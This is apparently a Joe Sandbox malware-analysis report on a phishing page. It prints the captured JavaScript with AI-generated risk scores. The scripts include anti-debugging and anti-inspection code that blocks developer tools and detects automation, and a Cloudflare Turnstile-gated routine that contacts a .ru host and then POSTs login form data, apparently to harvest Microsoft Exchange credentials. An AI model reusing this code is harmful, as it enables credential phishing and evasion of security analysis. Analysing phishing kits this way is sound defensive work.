o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t, |
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 5,
"reasoning": "Script implements anti-debugging and anti-inspection measures (blocks dev tools, disables right-click, detects automation tools) and includes obfuscated variable names. While it redirects to a legitimate Microsoft domain (-1 point), the aggressive anti-debugging behavior and obfuscation suggest potential suspicious intent (+2 points). The combination of these defensive measures could indicate an attempt to hide malicious behavior, though no clear harmful actions are present."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
(function YFxiWctIgj() {
let UICQSFckEK = false;
const MXLxhTRoCP = 100;
setInterval(function() {
const IYaOozQMbg = performance.now();
debugger;
const cqErKdldtE = performance.now();
if (cqErKdldtE - IYaOozQMbg > MXLxhTRoCP && !UICQSFckEK) {
UICQSFckEK = true;
window.location.replace('https://exchange.microsoft.com');
}
}, 1000);
})();
|
| URL: https://jbgw.yzvufnxc.ru/SNNgfwO/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "High-risk script showing multiple suspicious behaviors: 1) Makes requests to a suspicious Russian domain (.ru) with an unusually long hostname, 2) Contains form data exfiltration logic, 3) Uses redirects to Microsoft Exchange (likely for legitimacy appearance), 4) Implements Cloudflare Turnstile but appears to be using it maliciously, 5) Uses obfuscated/random-looking variable names. Pattern suggests potential phishing or credential harvesting attempt."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA0L_ooW9uraju6I',
'error-callback': sxuNZDnQim,
callback: HiMrHRXKPW,
});
function sxuNZDnQim() {
turnstile.reset();
}
function HiMrHRXKPW() {
var ISeVIXBOQG = document.getElementById("bUBJLctuvz");
ISeVIXBOQG.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = 'CgCf';
var cUqtrBXCjw = "../uokltBLIaDzv5yzq3yT3o";
fetch('https://EWnx8xRi6zljjePfgH6kOLGqbYCqaXmNZJNu3WrsAGGglkpHxZlSvSpmCqi1.birsbunh.ru/ocHmiBJJRAOdSnZGLKNmsVgQdsyoAGFWYIOLTQWQATDZZPXKRJSAVZEMPED', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(cUqtrBXCjw, {
method: "POST",
body: new FormData(ISeVIXBOQG)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
location.reload();
}
if(data['status'] == 'error'){
window.location.replace('https://exchange.microsoft.com');
}
});
}
if(text != 0){
window.location.replace('https://exchange.microsoft.com');
}
})
.catch(error => {
window.location.replace('https://exchange.microsoft.com');
});
}
|
| URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare challenge/security code. It contains standard postMessage communication between frames for Cloudflare's challenge system, uses known Cloudflare domains, and implements typical security challenge functionality. While it includes some encoded data (in md parameter), this is normal for Cloudflare's challenge tokens. The code follows expected patterns for legitimate security implementations."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'ynr3d',
chlApiSitekey: '0x4AAAAAAA0L_ooW9uraju6I',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '1/kVL2t161R37ZZrj_',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ebbddc13bee1865',
cH: 'tT9bkmA4CvF0Y.XtSfM4ngyjTpxVP1DXZzN9KOYk4WY-1733148267-1.1.1.1-q3GgQnjA5eJCWenrUaTvv1AT6kGbIfNoMa0q6GUlos29MUZYyYXcuxQjyPn3Lqqd',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'uyBftO0Ko04hErU0HeVxWAItEiItK57V0K4fw_Jc3Uk-1733148267-1.1.1.1-p.pbxQ9vtCr9ho934p5cd0D9.VFZVy59V_kXDc6dMo0zewMA_j2Q8vtSgKwXDaFjLFw8AqZz1fSXUithAep3wNqB0.hDEH6IQIZ3Flfke16b0cynd.pNYOre0QGLDxpD0cU4pEh7xFc9I_RIkLx71dekeZlJhmmtGqBdB8eRNimNOJFqzyt_yuAS1PB8hWr._n5Wt31WddHWxZ1C9MluVhkOmqD23Y4l2Za51.L8AwBFFjGn1FvKWhT9yVRcvJr.d7a2ogv1klrWjhsL6_HoCGoPMhNH3hUg6bCHV7KJt9M35QG7WjqoDbVEgcwaxRJTI.tEpBXOmtczcmTswniOOXEh_4Q7HGCW7RdX8HdWzCAwX7YIHngFR9gf8CiMQQrtYPW1CNS2DBFopcilVa50Ri5BEoJWOmx_a0S94O9Zkbo.zwTp.Tl9EMub6E2ahN04Q956x6DAjU_3qiDUWmhzyt9nuTRLagElsfhuCuTgAC5jZKrLyYaxW99FIsgpaXRsNo5k92qjUuMNfsyAns7jXkTFc1wE3tI1JU0mp8SbFx2ggisxpwviHSKjtkN2YH0Wzt2ZswlQAqzLCkVScEEklnObTKW1yakyzGueFOpMTP_nL.jMmkqeRk7cs71BBuFdabfVmi4X.b5BEXZ8UrGfMTxOOhG5rP6_bqzg89C5QUHOHBDYR6ZdE6CEhfzol0c4qBv6pEHsHCFmQynvstYSbfBpEQTMUW5OG09skrkqOOPSvjvhS3.rrCjbVNeCfpQaaLyoMeQMEn3ce44OXNEwh0UVMUmmdJpp1sEZR7Xa7QKptQyaPfFjAdz1u2d0sRJo4nBAb8P8z2CBQhNEV_FS4mklRCU1DlDK9HuTopswVEmVn1un79iuMGANIun2il3rwk667Qw3i1NvMYT3_0V1IyAiMo1RDJtf0lFgt_m9P0jI.VjUpPqIq8b7R1zQ16ZZ9QI5aTw5kxhhlKAG1wdAsn2J1d_WtJmDOP7epYYv2CHoOitmQl.BNNBfI..iMyYSsL8Rx2f97Oj6PWoI2RdwBpb8g7c0JCKFIITvAFkNSaWUqrypL_ULUGWVotiX1VHlf8.OsgcXOrGNNgFiOXwTrvp9PKr1FQ2gDIqt09LbDqyiyl6uWwIX75jUMQS_MXnKEVlvQQ6GFbiBSXcPsUxJPm._oP2Osx6BPNXAkU0Cqr8IBl21WRKF92N6E4JJfacvy96ba4ExsAP_0qR_C3T1.XuzKP3kkh0S8ZIYr206b0UTnA6M2zQpeBtznE9OO5khX8k7wXfodlWFvUvmZNgIO5c6vxoLmDVSeINhYVmPXLNpuj795b69zJd_SW_2g_SrlFx.D5dW5h.e1p2w7KtOhqya4nPp.ThDyZUPxxuOz5s',
cITimeS: '1733148267',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'ynr3d',
nextRcV: '1/kVL2t161R37ZZrj_',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
Edit tour
chrome.exe (PID: 6988 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node